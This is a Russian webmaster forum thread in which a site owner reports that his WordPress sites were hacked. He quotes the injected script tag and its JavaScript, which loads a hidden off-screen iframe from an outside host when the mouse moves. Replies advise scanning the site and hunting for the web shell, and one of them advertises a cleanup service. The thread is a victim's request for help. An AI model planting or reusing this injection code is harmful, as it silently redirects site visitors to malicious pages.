Форум Практика оптимизации Любые вопросы от новичков по оптимизации

Атакованы сайты на WP

Misha0o
На сайте с 12.08.2012
Offline
74
Misha0o
407

В конец каждой странички всех сайтов, вставлена следующая строчка:

<script src="http://kinoshkaxa.changeip.name/rsize.js"></script>

Содержимое скрипта: 

res='cdvymoy.esmtp.biz';

var astatf = 0; document.write("<head></head><b><div id='pftgfkz'></div></b>");document.onmousemove=jsstatic; function jsstatic() { if (astatf == 0) { astatf++; text = "<iframe src='http://"+res+"/advjump/2' width='6' height='10' style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'></iframe>"; document.getElementById("pftgfkz").innerHTML = text }}

Буду лечить.

Хотелось бы знать, что делает этот скрипт.

R
На сайте с 24.01.2008
Offline
180
Алексей
#1

Данный скрипт может вам подключать фрейм, партнерку и все что угодно.

Проверяйте внимательно весь код сайта, если не справитесь стучите, проверим сайт на все виды вирусов + дадим рекомендации!

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
S
На сайте с 06.08.2008
Offline
130
spiderbuber
#2

Сначала ищите шелл и саму уязвимость, а потом уже всё остальное.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий